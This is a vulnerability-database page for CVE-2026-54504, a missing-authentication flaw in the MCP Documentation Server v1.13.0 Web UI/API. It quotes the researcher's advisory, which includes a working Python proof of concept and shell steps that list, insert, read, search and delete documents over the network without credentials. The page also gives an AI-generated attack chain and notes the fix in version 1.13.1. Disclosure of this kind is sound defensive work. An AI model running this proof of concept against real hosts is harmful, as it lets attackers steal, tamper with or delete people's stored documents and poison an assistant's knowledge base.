Skip to main content

MCP Documentation Server CVE-2026-54504

HIGH
Missing Authentication for Critical Function (CWE-306)
2026-07-15 https://github.com/andrea9293/mcp-documentation-server GHSA-6f5r-5672-72j7
8.8
CVSS 3.1 · GitHub Advisory
Share

Severity by source

GitHub Advisory PRIMARY
8.8 HIGH
AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
vuln.today AI
8.8 HIGH

Adjacent-network reachability (LAN/VM/Docker bridge) sets AV:A not AV:N; no auth or interaction gives PR:N/UI:N/AC:L; full read/tamper/delete of the corpus yields C:H/I:H/A:H.

3.1 AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
4.0 AV:A/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

Primary rating from GitHub Advisory.

CVSS VectorGitHub Advisory

CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector
Adjacent
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
High
Integrity
High
Availability
High

Lifecycle Timeline

3
Source Code Evidence Fetched
Jul 15, 2026 - 23:46 vuln.today
Analysis Generated
Jul 15, 2026 - 23:46 vuln.today
CVE Published
Jul 15, 2026 - 23:26 github-advisory
HIGH 8.8

DescriptionGitHub Advisory

Summary

@andrea9293/mcp-documentation-server v1.13.0 documents that a Web UI starts automatically on port 3080. However, the Web UI/API appears to bind to all network interfaces by default (*:3080 / 0.0.0.0:3080) instead of localhost-only, and its document-management API endpoints do not require authentication.

As a result, any network-reachable client on the same LAN, VM network, or container bridge can access the document-admin API without credentials. In my reproduction, I was able to enumerate documents, add a document, read its full content, search across the corpus, and delete the document through the host's LAN IP.

The issue is not that a Web UI exists. The issue is that a local document-management Web UI/API is exposed on all interfaces by default without authentication.

Details

The README documents that the Web UI starts automatically and tells users to open:

text
http://localhost:3080

It also documents START_WEB_UI=true and WEB_PORT=3080 as the defaults.

The vulnerable behavior appears to come from starting the web server without binding it to localhost explicitly.

In src/server.ts, the Web UI is started unless START_WEB_UI=false:

ts
if (process.env.START_WEB_UI !== 'false') {
    initializeDocumentManager().then(manager => {
        return startWebServer(undefined, manager);
    }).then(() => {
        console.error('[Server] Web UI started (port=' + (process.env.WEB_PORT || '3080') + ')');
    })...
}

In src/web-server.ts, the Express app appears to listen with only the port:

ts
const server = app.listen(PORT, () => {
    console.log(`\n  🌐 MCP Documentation Server - Web UI`);
    console.log(`  ────────────────────────────────────`);
    console.log(`  Local:   http://localhost:${PORT}`);
    console.log(`  Network: http://0.0.0.0:${PORT}\n`);
});

With Express/Node, app.listen(PORT) without a host argument binds to all interfaces. In my reproduction, this resulted in:

text
LISTEN 0 511 *:3080 *:* users:(("MainThread",pid=1781375,fd=21))

The exposed API includes document-admin operations such as:

text
GET    /api/documents
GET    /api/documents/:id
POST   /api/documents
POST   /api/search-all
DELETE /api/documents/:id
GET    /api/config

I did not send any Authorization header in the PoC requests, and all tested operations succeeded.

PoC

Tested on v1.13.0.

1. Build from source
bash
cd ~/Desktop
mkdir -p docsrv_repro_from_scratch
cd docsrv_repro_from_scratch

git clone https://github.com/andrea9293/mcp-documentation-server.git
cd mcp-documentation-server

git rev-parse HEAD
npm install --no-audit --no-fund
npm run build

ls -l dist/server.js
node -p "require('./package.json').version"

Expected version:

text
1.13.0
2. Start the server with default Web UI behavior

Do not set START_WEB_UI=false.

bash
rm -rf /tmp/docsrv_base
mkdir -p /tmp/docsrv_base

MCP_BASE_DIR=/tmp/docsrv_base \
WEB_PORT=3080 \
node dist/server.js \
  </dev/null \
  >/tmp/docsrv_stdout.log \
  2>/tmp/docsrv_stderr.log &

DOCSRV_PID=$!
sleep 5

echo "DOCSRV_PID=$DOCSRV_PID"
ps -p "$DOCSRV_PID" -o pid,stat,cmd
3. Confirm that the Web UI/API binds to all interfaces
bash
ss -ltnp | grep ':3080' || true

Observed:

text
LISTEN 0 511 *:3080 *:* users:(("MainThread",pid=1781375,fd=21))

This indicates the service is not bound only to 127.0.0.1.

4. Confirm that the API is reachable through the LAN IP
bash
LAN_IP=$(hostname -I | awk '{print $1}')
echo "LAN_IP=$LAN_IP"

curl -sS --max-time 5 "http://$LAN_IP:3080/api/config"
echo

Observed:

text
LAN_IP=10.0.250.230
{"gemini_available":false,"embedding_model":"Xenova/all-MiniLM-L6-v2"}

No authentication header was sent.

5. Full unauthenticated document-admin PoC
bash
cat > /tmp/docsrv_unauth_poc.py <<'PY'
#!/usr/bin/env python3
import json
import sys
import urllib.request
import urllib.error

HOST = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
PORT = int(sys.argv[2]) if len(sys.argv) > 2 else 3080
BASE = f"http://{HOST}:{PORT}"

def req(method, path, body=None):
    data = json.dumps(body).encode() if body is not None else None
    headers = {"Content-Type": "application/json"} if body is not None else {}
    r = urllib.request.Request(f"{BASE}{path}", data=data, method=method, headers=headers)
    with urllib.request.urlopen(r, timeout=10) as resp:
        raw = resp.read().decode()
        try:
            return resp.status, json.loads(raw or "null")
        except Exception:
            return resp.status, raw

def main():
    print(f"[poc] target = {BASE}")
    print("[poc] no Authorization header is sent")

    status, config = req("GET", "/api/config")
    print(f"[0] config: HTTP {status}, {config}")

    status, docs = req("GET", "/api/documents")
    print(f"[1] list documents: HTTP {status}, count={len(docs) if isinstance(docs, list) else 'unknown'}")

    marker = "ATTACKER_CONTROLLED_DOCUMENT_MARKER_unauth_network_api"
    body = {
        "title": "network-inserted-test-document",
        "content": marker + "\nThis document was inserted through the unauthenticated network API.",
        "metadata": {"source": "unauth-network-poc"}
    }

    status, added = req("POST", "/api/documents", body)
    print(f"[2] add document: HTTP {status}, response={added}")

    doc_id = None
    if isinstance(added, dict):
        doc_id = added.get("id") or added.get("document", {}).get("id")

    if not doc_id:
        status, docs = req("GET", "/api/documents")
        for d in docs:
            if d.get("title") == "network-inserted-test-document":
                doc_id = d.get("id")
                break

    if not doc_id:
        raise RuntimeError("could not locate inserted document id")

    print(f"[2] inserted id={doc_id}")

    status, doc = req("GET", f"/api/documents/{doc_id}")
    content = doc.get("content", "") if isinstance(doc, dict) else str(doc)
    print(f"[3] read document: HTTP {status}, marker_present={marker in content}")

    status, hits = req("POST", "/api/search-all", {
        "query": "ATTACKER_CONTROLLED_DOCUMENT_MARKER network inserted",
        "limit": 5
    })
    print(f"[4] search-all: HTTP {status}, response_prefix={str(hits)[:300]!r}")

    status, deleted = req("DELETE", f"/api/documents/{doc_id}")
    print(f"[5] delete document: HTTP {status}, response={deleted}")

    print("[poc] DONE")

if __name__ == "__main__":
    main()
PY

chmod +x /tmp/docsrv_unauth_poc.py

Run against localhost:

bash
python3 /tmp/docsrv_unauth_poc.py 127.0.0.1 3080

Observed:

text
[poc] target = http://127.0.0.1:3080
[poc] no Authorization header is sent
[0] config: HTTP 200, {'gemini_available': False, 'embedding_model': 'Xenova/all-MiniLM-L6-v2'}
[1] list documents: HTTP 200, count=0
[2] add document: HTTP 200, response={'id': 'ef13280d7441d5bb', 'title': 'network-inserted-test-document', 'message': 'Document added successfully'}
[2] inserted id=ef13280d7441d5bb
[3] read document: HTTP 200, marker_present=True
[4] search-all: HTTP 200, response_prefix="[{'document_id': 'ef13280d7441d5bb', 'parent_index': 0, 'score': 1, 'content': 'ATTACKER_CONTROLLED_DOCUMENT_MARKER_unauth_network_api\\nThis document was inserted through the unauthenticated network API.'}]"
[5] delete document: HTTP 200, response={'success': True, 'message': 'Document "network-inserted-test-document" deleted'}
[poc] DONE

Run the same PoC against the host's LAN IP:

bash
LAN_IP=$(hostname -I | awk '{print $1}')
python3 /tmp/docsrv_unauth_poc.py "$LAN_IP" 3080

Observed:

text
[poc] target = http://10.0.250.230:3080
[poc] no Authorization header is sent
[0] config: HTTP 200, {'gemini_available': False, 'embedding_model': 'Xenova/all-MiniLM-L6-v2'}
[1] list documents: HTTP 200, count=0
[2] add document: HTTP 200, response={'id': 'ef13280d7441d5bb', 'title': 'network-inserted-test-document', 'message': 'Document added successfully'}
[2] inserted id=ef13280d7441d5bb
[3] read document: HTTP 200, marker_present=True
[4] search-all: HTTP 200, response_prefix="[{'document_id': 'ef13280d7441d5bb', 'parent_index': 0, 'score': 1, 'content': 'ATTACKER_CONTROLLED_DOCUMENT_MARKER_unauth_network_api\\nThis document was inserted through the unauthenticated network API.'}]"
[5] delete document: HTTP 200, response={'success': True, 'message': 'Document "network-inserted-test-document" deleted'}
[poc] DONE
6. Cleanup
bash
kill "$DOCSRV_PID" 2>/dev/null || true
fuser -k 3080/tcp 2>/dev/null || true
rm -rf /tmp/docsrv_base
rm -f /tmp/docsrv_unauth_poc.py
rm -f /tmp/docsrv_stdout.log /tmp/docsrv_stderr.log

Impact

This is a missing-authentication and unsafe-default network exposure issue for the Web UI/API.

A network-reachable attacker can access the document-management API without credentials. Depending on what the user stores in the documentation server, this may allow:

  • reading document titles, previews, and full document contents;
  • searching across the entire document corpus;
  • inserting attacker-controlled documents into the corpus;
  • deleting documents;
  • tampering with the user's local knowledge base used by the MCP assistant.

This can affect users who run the MCP server on laptops, workstations, dev VMs, or hosts connected to shared networks, VPNs, Docker bridges, or other routable local networks.

This is not a claim for unauthenticated remote code execution. The issue is that the documented Web UI/API is exposed on all interfaces by default and does not require authentication for document-admin operations.

A safer default would be to bind the Web UI/API to 127.0.0.1 by default, and require an explicit opt-in such as WEB_BIND_HOST=0.0.0.0 for network exposure. If network binding is supported, an authentication token should be required for document-management endpoints.

AnalysisAI

Missing authentication in @andrea9293/mcp-documentation-server v1.13.0 exposes its document-management Web UI/API on all network interfaces (0.0.0.0:3080) instead of localhost, letting any adjacent-network client read, add, search, and delete documents in the MCP knowledge base without credentials. Rated CVSS 8.8 (CWE-306), the flaw is exploitable by unauthenticated attackers reachable over the same LAN, VM network, Docker bridge, or VPN. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Access
Gain foothold on adjacent network
Delivery
Scan for open TCP 3080
Exploit
Reach unauthenticated /api/config and /api/documents
Execution
Enumerate and read full document corpus
Persist
Insert or delete documents to tamper knowledge base
Impact
Exfiltrate data and poison MCP assistant

Vulnerability AssessmentAI

Exploitation Requires that the automatically-started Web UI is running (the default: START_WEB_UI is not set to 'false') and listening on its default port 3080 with the default all-interfaces binding of v1.13.0, and that the attacker is on a network able to route to the host - same LAN, VM network, Docker bridge, or VPN (reflecting AV:A, Adjacent). … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The signals are largely consistent in pointing to a genuine, moderately-scoped risk rather than an inflated high-CVSS artifact. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who gains a foothold on the same network segment as a developer's laptop or a shared dev VM - for example another container on the Docker bridge, another VPN client, or a compromised host on the office LAN - scans for TCP 3080 and finds the MCP Documentation Server's unauthenticated API. Because attack complexity is low and no credentials or user interaction are required (AV:A/AC:L/PR:N/UI:N), the attacker enumerates and exfiltrates the full document corpus via GET /api/documents and POST /api/search-all, then poisons the assistant's knowledge base by inserting attacker-controlled documents or deleting existing ones. …
Remediation Vendor-released patch: upgrade to 1.13.1 or later (npm install @andrea9293/mcp-documentation-server@1.13.1), which introduces a WEB_HOST environment variable defaulting to 127.0.0.1 so the Web UI binds to localhost only, per the fix in commit 37159d4e06b8ee50c3645b2496e3d3f6d32c47f9 and advisory GHSA-6f5r-5672-72j7. … Detailed patch versions, workarounds, and compensating controls in full report.

Recommended ActionAI

Within 24 hours, identify all systems running @andrea9293/mcp-documentation-server v1.13.0 and audit their network exposure, particularly to untrusted segments, as publicly available exploit code exists for this vulnerability. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Docker

View all
CVE-2024-55964 CRITICAL POC
9.8 Mar 26

An issue was discovered in Appsmith before 1.52. Rated critical severity (CVSS 9.8), this vulnerability is remotely expl

CVE-2019-5736 HIGH POC
8.6 Feb 11

runc through version 1.0-rc6 (used in Docker before 18.09.2) contains a container escape vulnerability that allows attac

CVE-2023-32077 HIGH POC
7.5 Aug 24

Netmaker makes networks with WireGuard. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable, no a

CVE-2026-39987 CRITICAL POC
9.3 Apr 08

Unauthenticated remote code execution in Marimo ≤0.20.4 allows attackers to execute arbitrary system commands via the `/

CVE-2023-5815 HIGH POC
8.1 Nov 22

The News & Blog Designer Pack - WordPress Blog Plugin - (Blog Post Grid, Blog Post Slider, Blog Post Carousel, Blog Post

CVE-2014-9357 CRITICAL
10.0 Dec 16

Docker 1.3.2 allows remote attackers to execute arbitrary code with root privileges via a crafted (1) image or (2) build

CVE-2026-34156 CRITICAL POC
9.9 Mar 30

Remote code execution in NocoBase Workflow Script Node (npm @nocobase/plugin-workflow-javascript) allows authenticated l

CVE-2019-15752 HIGH POC
7.8 Aug 28

Docker Desktop Community Edition before 2.1.0.1 allows local users to gain privileges by placing a Trojan horse docker-c

CVE-2025-34221 CRITICAL POC
10.0 Sep 29

Vasion Print (formerly PrinterLogic) Virtual Appliance Host prior to version 25.2.169 and Application prior to version 2

CVE-2024-23054 CRITICAL POC
9.8 Feb 05

An issue in Plone Docker Official Image 5.2.13 (5221) open-source software that could allow for remote code execution du

CVE-2025-23211 CRITICAL POC
9.9 Jan 28

Tandoor Recipes is an application for managing recipes, planning meals, and building shopping lists. Rated critical seve

CVE-2026-46339 CRITICAL POC
10.0 May 19

Unauthenticated remote code execution in 9router (npm package) versions 0.4.30 through 0.4.36 allows network-adjacent at

Share

CVE-2026-54504 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy